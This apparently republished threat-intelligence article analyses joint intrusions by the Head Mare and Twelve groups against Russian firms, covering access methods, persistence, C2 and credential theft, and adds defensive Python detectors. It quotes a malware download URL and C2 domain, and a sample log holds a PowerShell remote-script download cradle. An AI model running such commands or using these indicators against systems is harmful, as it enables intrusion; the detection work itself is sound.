The recent investigation into cyberattacks targeting Russian companies underscores a worrying evolution in hacktivist tactics. In a series of incidents during September 2024, two groups—Head Mare and Twelve—appeared to have joined forces, sharing both techniques and even command-and-control (C2) infrastructure. This comprehensive analysis dives into the technical details uncovered in the report, the methods deployed by these adversaries, and what Windows users and IT professionals can learn from their evolving tactics.
A Convergence of Hacktivist Operations
The research reveals that Head Mare, previously known for its phishing-driven intrusions, has stepped up its game by adopting tools and tactics long associated with the Twelve group. Notably:
- Shared Toolkits: Head Mare’s recent campaigns employed several publicly available and leaked tools, including mimikatz, ADRecon, secretsdump, ProcDump, and utilities like mRemoteNG and PSExec. What makes this particularly significant is the adoption of the CobInt backdoor—a tool that had only been seen in Twelve’s operations until now.
- Command-and-Control Overlap: Head Mare’s use of C2 servers that were previously linked exclusively to Twelve suggests coordinated or collaborative operations between the groups. This convergence is not only a sign of shared resources but also of a strategic evolution in their operational security and infrastructure choices.
- New Entrants in the Arsenal: The introduction of the PhantomJitter backdoor in August 2024 represents another shift. Deployed on servers for remote command execution, this tool further blurs the lines between the previously separate kill chains of Head Mare and Twelve.
Technical Anatomy of the Attack
Initial Intrusion and Access Methods
The attackers expanded their traditional phishing techniques by compromising trusted relationships. Here’s how they gained access:
- Phishing & Vulnerability Exploitation:
  - Phishing emails with malicious attachments continue to be a primary vector.
  - Exploitation of vulnerabilities such as CVE-2023-38831 in WinRAR and the long-known ProxyLogon vulnerability (CVE-2021-26855) on Microsoft Exchange servers (a critical concern given that many organizations still run outdated software).
- Compromised Contractors and RDP Abuse:
  - Beyond phishing, the attackers infiltrated networks through compromised contractors with legitimate access to business automation platforms.
  - They leveraged Remote Desktop Protocol (RDP) connections—an age-old yet still potent method when not sufficiently secured.
Establishing a Foothold: Persistence and Anti-Detection Measures
Once inside, the adversaries quickly established persistence while sneaking past detection mechanisms:
- Privileged Local Accounts:
  - Instead of the more traditional scheduled tasks, attackers now create new local users with elevated privileges on business automation platforms. This approach not only aids persistence but also leverages RDP for interactive tool transfers.
- Traffic Tunneling Services:
  - Tools like Localtonet, when combined with the Non-Sucking Service Manager (NSSM), offer a reliable way to run non-service applications as if they were native Windows services. This stealthy installation means that even if basic task scheduling is monitored, the traffic tunneling remains concealed.
- File Masquerading and Log Clearing:
  - The attackers renamed executables—imagine cmd.exe being repurposed as log.exe—to blend into legitimate system processes.
  - They also went to lengths to clear event logs and remove traces of their services using PowerShell commands, making forensic investigations even more challenging.
Regularly monitor system logs and consider deploying enhanced logging solutions that can alert you to unusual file renaming or new account creation activities.
Command and Control (C2) Infrastructure
The command and control methodology reflects sophistication and resource sharing:
- PhantomJitter Backdoor Deployment:
  - After exploiting business automation servers, the attackers downloaded the PhantomJitter backdoor from hard-coded URLs (e.g., using addresses like http://45.87.246[.]34:443/calc.exe). This malware established a direct tunnel for remote command execution.
- CobInt Backdoor Revisited:
  - Aligning with Twelve’s previous footprint, CobInt payloads connected to domains such as 360nvidia[.]com, resolving to specific IP addresses. By merging these tools, the attackers not only diversified their C2 options but also increased redundancy in their command infrastructure.
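Reports publish network indicators in defanged form (the `[.]` notation used above), so a defender's first job is to normalise them and sweep proxy and DNS logs for hits. The following is an added example, not code from the Securelist report or this article: it refangs the two indicators quoted above and matches them against constructed proxy/DNS log lines. The log format, the internal source addresses and the DNS answer 203.0.113.7 are all assumptions made for the example; subdomains of a listed domain are treated as hits as well, which goes slightly beyond the two literal indicators in the text.

```python
import re
from urllib.parse import urlsplit

# Defanged network indicators exactly as quoted in the write-up above.
DEFANGED_IOCS = [
    "http://45.87.246[.]34:443/calc.exe",   # PhantomJitter download URL
    "360nvidia[.]com",                       # CobInt C2 domain
]

# Constructed proxy and DNS log lines (not from the report). The internal
# 10.0.8.x sources and the 203.0.113.7 answer are documentation addresses.
SAMPLE_LOGS = [
    "2024-09-12T10:14:03Z proxy src=10.0.8.15 method=GET url=http://45.87.246.34:443/calc.exe status=200 bytes=231424",
    "2024-09-12T10:14:05Z dns src=10.0.8.15 query=360nvidia.com type=A answer=203.0.113.7",
    "2024-09-12T10:14:06Z dns src=10.0.8.15 query=cdn.360nvidia.com type=A answer=203.0.113.7",
    "2024-09-12T10:15:00Z dns src=10.0.8.22 query=update.microsoft.com type=A answer=203.0.113.9",
    "2024-09-12T10:16:41Z proxy src=10.0.8.22 method=GET url=https://example.org/index.html status=200 bytes=1024",
]


def refang(indicator: str) -> str:
    """Reverse the defanging conventions used in threat reports ([.], hxxp, [:])."""
    s = indicator.strip()
    s = re.sub(r"^hxxp", "http", s, flags=re.IGNORECASE)
    for bad, good in (("[.]", "."), ("(.)", "."), ("{.}", "."), ("[:]", ":"), ("[://]", "://")):
        s = s.replace(bad, good)
    return s


def split_indicator(indicator: str):
    """Return (host, url) for a refanged indicator; url is None for bare domains."""
    s = refang(indicator)
    if "://" in s:
        return urlsplit(s).hostname.lower(), s.lower()
    return s.split("/")[0].split(":")[0].lower(), None


def parse_kv(line: str) -> dict:
    """Parse the space-separated key=value fields of one log line."""
    return dict(tok.split("=", 1) for tok in line.split() if "=" in tok)


def host_matches(candidate: str, ioc_host: str) -> bool:
    """Exact match or subdomain of the indicator host (e.g. cdn.360nvidia.com)."""
    candidate = candidate.lower().rstrip(".")
    return candidate == ioc_host or candidate.endswith("." + ioc_host)


def match_lines(lines, iocs):
    """Return (line, indicator, reason) for every log line that hits an IoC."""
    hosts, urls = {}, {}
    for ioc in iocs:
        host, url = split_indicator(ioc)
        hosts[host] = ioc
        if url:
            urls[url] = ioc
    hits = []
    for line in lines:
        fields = parse_kv(line)
        url = fields.get("url", "").lower()
        if url and url in urls:
            hits.append((line, urls[url], "url"))
            continue
        # Fall back to the host part of the URL, or the DNS query name.
        name = urlsplit(url).hostname if url else fields.get("query")
        for ioc_host, ioc in hosts.items():
            if name and host_matches(name, ioc_host):
                hits.append((line, ioc, "host"))
                break
    return hits


if __name__ == "__main__":
    for line, ioc, reason in match_lines(SAMPLE_LOGS, DEFANGED_IOCS):
        print(f"[{reason}] {ioc} <- {line}")
```

Matching on the full URL first and only then on the host keeps the reason field useful: a URL hit pins the PhantomJitter download itself, while a host hit on the CobInt domain or one of its subdomains flags the C2 channel even when the path differs from the published sample.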
Pivoting with Custom PowerShell Scripts
A particularly interesting aspect of the attack involves a custom PowerShell script—proxy.ps1—that plays a dual role:
- Dual-Role Script:
  - The script downloads an archive, extracts it, and installs tunneling tools like cloudflared and Gost, mimicking standard Windows services by placing the executables in the System32 folder.
  - It allows dynamic configuration through command-line parameters (such as port numbers and tokens), streamlining the setup of these proxies.
- Execution Details: the script’s options include:
  - Installing the Gost service with a substitution in its service configuration files.
  - Configuring cloudflared with a token for establishing encrypted tunnels.
  - Uninstalling these services cleanly when the -u flag is passed, which the investigation also highlighted.
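The persistence section above (privileged local accounts, NSSM-wrapped tunnels, renamed binaries, cleared logs) and the proxy.ps1 section (cloudflared and Gost installed as services in System32) describe signals that a SIEM rule set can correlate. The following is an added example and not code from the report or this article: it runs a small set of detection rules over constructed, normalised event records in the shape of Security 4720/4732/1102, System 7045 and Sysmon Event ID 1. The field names, host names, account names and timestamps are assumptions; real EVTX records carry different field names (for instance 4732 reports a member SID rather than a name) and would need a mapping layer in front of this logic.

```python
from datetime import datetime, timedelta

# Constructed, normalised event records (not real EVTX data). Channels and
# event IDs are real; the field names are a simplified mapping for the example.
SAMPLE_EVENTS = [
    {"ts": "2024-09-12T10:20:00Z", "channel": "Security", "id": 4720, "host": "APP-SRV01",
     "subject": "svc_deploy", "target": "sysadm1n"},
    {"ts": "2024-09-12T10:20:04Z", "channel": "Security", "id": 4732, "host": "APP-SRV01",
     "subject": "svc_deploy", "member": "sysadm1n", "group": "Administrators"},
    {"ts": "2024-09-12T10:31:10Z", "channel": "System", "id": 7045, "host": "APP-SRV01",
     "service": "LocaltonetSvc", "image": r"C:\ProgramData\nssm.exe"},
    {"ts": "2024-09-12T10:33:00Z", "channel": "System", "id": 7045, "host": "APP-SRV01",
     "service": "gost", "image": r"C:\Windows\System32\gost.exe"},
    {"ts": "2024-09-12T10:40:12Z", "channel": "Sysmon", "id": 1, "host": "APP-SRV01",
     "image": r"C:\Windows\Temp\log.exe", "original_file_name": "Cmd.Exe"},
    {"ts": "2024-09-12T11:05:00Z", "channel": "Security", "id": 1102, "host": "APP-SRV01",
     "subject": "sysadm1n"},
    # Benign activity on another host, to show the rules stay quiet.
    {"ts": "2024-09-12T10:41:00Z", "channel": "Sysmon", "id": 1, "host": "WS-07",
     "image": r"C:\Windows\System32\cmd.exe", "original_file_name": "Cmd.Exe"},
    {"ts": "2024-09-12T10:42:00Z", "channel": "System", "id": 7045, "host": "WS-07",
     "service": "Spooler", "image": r"C:\Windows\System32\spoolsv.exe"},
]

# Binaries named in the write-up that should never appear as a service image.
TUNNEL_BINARIES = {"nssm.exe", "localtonet.exe", "cloudflared.exe", "gost.exe"}
ADMIN_GROUPS = {"administrators", "remote desktop users"}
ADMIN_WINDOW = timedelta(minutes=30)   # creation -> admin membership window


def _ts(rec):
    return datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))


def _base(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def correlate_events(events):
    """Return (rule, host, detail) alerts for the patterns described above."""
    alerts = []
    created = {}                       # (host, account) -> creation time
    for e in sorted(events, key=_ts):
        ch, eid, host = e["channel"], e["id"], e["host"]
        if ch == "Security" and eid == 4720:
            created[(host, e["target"].lower())] = _ts(e)
        elif ch == "Security" and eid == 4732 and e["group"].lower() in ADMIN_GROUPS:
            t0 = created.get((host, e["member"].lower()))
            if t0 is not None and _ts(e) - t0 <= ADMIN_WINDOW:
                alerts.append(("new_privileged_local_account", host,
                               f"{e['member']} created and added to {e['group']} by {e['subject']}"))
        elif ch == "System" and eid == 7045 and _base(e["image"]) in TUNNEL_BINARIES:
            alerts.append(("tunnel_or_wrapper_service", host, f"{e['service']} -> {e['image']}"))
        elif ch == "Sysmon" and eid == 1:
            # A binary whose on-disk name differs from its PE OriginalFileName
            # is the cmd.exe -> log.exe masquerade from the write-up.
            if _base(e["image"]) != e.get("original_file_name", "").lower():
                alerts.append(("renamed_system_binary", host,
                               f"{e['image']} has OriginalFileName {e['original_file_name']}"))
        elif ch == "Security" and eid == 1102:
            alerts.append(("audit_log_cleared", host, f"cleared by {e['subject']}"))
    return alerts


if __name__ == "__main__":
    for rule, host, detail in correlate_events(SAMPLE_EVENTS):
        print(f"{host}: {rule}: {detail}")
```

The OriginalFileName comparison is the noisiest of the four rules in practice: some vendors ship legitimately renamed binaries, so a production version needs an allowlist, whereas the 7045 image-name rule and the 1102 rule have almost no benign matches on a business application server. Note also that 1102 is logged only if the attacker clears the Security log through the API; clearing other logs shows up as System 104 and would need a matching rule.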
Reconnaissance, Privilege Escalation, and Further Exploitation
The attackers didn’t stop at initial access and persistence—they conducted detailed internal reconnaissance:
- Reconnaissance Tools:
  - Standard system utilities like quser.exe, tasklist.exe, and netstat.exe were deployed along with network-specific tools such as SoftPerfect Network Scanner and fscan.
  - The use of ADRecon scripts allowed for a granular assessment of the internal Active Directory environment, mapping computers, group memberships, and trust relationships.
- Post-Exploitation Tactics:
  - Upon gaining remote access, the adversaries executed a command that invoked PowerShell (using techniques to bypass execution policies). This command fetched a remote script (vivo.txt) suspected of launching a reverse shell.
  - The reverse shell activity resulted in the creation of persistent scripts (e.g., mcdrive.vbs and mcdrive.ps1) coupled with registry modifications to generate autorun entries.
- Credential Stealing:
  - Tools such as mimikatz, secretsdump, and a newly identified Go-based sample (update.exe) were utilized to extract credentials and critical system files (like the ntds.dit file).
  - This aggressive credential access is consistent with well-established lateral-movement tradecraft and sets up further exploitation of the compromised environment.
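The post-exploitation steps above leave three distinct footprints: a PowerShell command line that bypasses the execution policy and pulls a remote script, a Run-key autorun entry pointing at a script host, and a process touching ntds.dit. As an added example (not code from the report or this article), the block below scores constructed Sysmon-style process-creation (Event ID 1) and registry-value-set (Event ID 13) records against those footprints. The command lines, the placeholder host 203.0.113.50 serving vivo.txt, the `-o` switch on update.exe, and the registry paths are all assumptions; the rules deliberately require more than an execution-policy bypass on its own, since administrators' own scripts use that switch constantly.

```python
import re

# Constructed Sysmon-style records (not from the report). 203.0.113.50 is a
# documentation address standing in for the unknown host that served vivo.txt;
# the "-o" switch on update.exe is invented for the example.
SAMPLE_RECORDS = [
    {"id": 1, "host": "APP-SRV01", "user": "sysadm1n",
     "command_line": "powershell.exe -nop -w hidden -ExecutionPolicy Bypass -c "
                     "\"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.50/vivo.txt')\""},
    {"id": 1, "host": "WS-07", "user": "jdoe",      # benign admin script, bypass only
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"id": 13, "host": "APP-SRV01", "user": "sysadm1n",
     "target_object": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\mcdrive",
     "details": r"wscript.exe C:\Users\sysadm1n\AppData\Roaming\mcdrive.vbs"},
    {"id": 13, "host": "WS-07", "user": "jdoe",     # benign autorun
     "target_object": r"HKU\S-1-5-21-1111-2222-3333-1002\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "details": r"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"id": 1, "host": "DC01", "user": "sysadm1n",
     "command_line": r"C:\Windows\Temp\update.exe -o C:\Windows\Temp\ntds.dit"},
]

PS_BYPASS    = re.compile(r"-e[a-z]*\s+bypass", re.I)          # -ExecutionPolicy / -ep / -ex Bypass
REMOTE_FETCH = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                          r"net\.webclient|invoke-restmethod|\birm\b", re.I)
STEALTH      = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b", re.I)
NTDS_REF     = re.compile(r"ntds\.dit", re.I)
RUN_KEY      = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.I)
SCRIPT_HOST  = re.compile(r"wscript|cscript|powershell|pwsh|mshta|\.vbs\b|\.ps1\b|\.js\b|\.hta\b", re.I)

PROCESS_RULES = (
    ("execution_policy_bypass", PS_BYPASS),
    ("remote_script_fetch", REMOTE_FETCH),
    ("stealth_switches", STEALTH),
    ("ntds_reference", NTDS_REF),
)


def classify_process(command_line):
    """Return (suspicious, reasons). A bypass alone is not enough to alert."""
    reasons = [name for name, rx in PROCESS_RULES if rx.search(command_line)]
    suspicious = ("remote_script_fetch" in reasons
                  or "ntds_reference" in reasons
                  or len(reasons) >= 2)
    return suspicious, reasons


def classify_registry(target_object, details):
    """Run/RunOnce value whose data launches a script host or script file."""
    return bool(RUN_KEY.search(target_object) and SCRIPT_HOST.search(details))


def detect_post_exploitation(records):
    """Return (rule, host, user, detail) alerts over the record list."""
    alerts = []
    for r in records:
        if r["id"] == 1:
            hit, reasons = classify_process(r["command_line"])
            if hit:
                alerts.append(("suspicious_process", r["host"], r["user"], ", ".join(reasons)))
        elif r["id"] == 13 and classify_registry(r["target_object"], r["details"]):
            value = r["target_object"].rsplit("\\", 1)[-1]
            alerts.append(("script_autorun", r["host"], r["user"], f"{value} -> {r['details']}"))
    return alerts


if __name__ == "__main__":
    for alert in detect_post_exploitation(SAMPLE_RECORDS):
        print(alert)
```

The scoring rule mirrors how a SOC analyst reads these events: `-ExecutionPolicy Bypass` by itself is routine, but combined with a download cradle or hidden-window switches it matches the vivo.txt fetch described above, while any reference to ntds.dit outside of backup software is worth a ticket on its own.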
Implications for Windows Security and Best Practices
The evolving tactics observed in this investigation signal several important takeaways for IT professionals:
- Patch Management is Paramount: With vulnerabilities like ProxyLogon remaining exploitable on legacy systems (e.g., Windows Server 2012 R2, Microsoft Exchange 2016), timely patching and system updates are no longer optional—they are a critical security practice.
- Enhanced Monitoring and Logging: Given stealthy tactics such as file masquerading and event log clearing, implementing advanced logging and monitoring that detects anomalies in user account activity or system file modifications is essential.
- User Awareness and Training: Social engineering remains a key component of these attacks. Ongoing employee training and robust email filtering are necessary to prevent initial compromise.
- Zero Trust and Network Segmentation: Given that attackers exploited trusted relationships between contractors and internal systems, adopting a Zero Trust architecture with strict network segmentation can substantially reduce lateral movement risks.
In Closing
The intricate interplay between Head Mare and Twelve in these joint campaigns offers a stark reminder that threat actors are not working in isolation—their collaboration further complicates attribution and defense. By dissecting the techniques, persistence mechanisms, and C2 strategies used in these attacks, security teams are better equipped to forecast potential vectors of compromise and fortify their systems. Vigilance, proactive patching, and a deep understanding of both emerging and established threat tools are key to staying ahead in this relentless cybersecurity arms race.
Source: Securelist Head Mare and Twelve: Joint attacks on Russian entities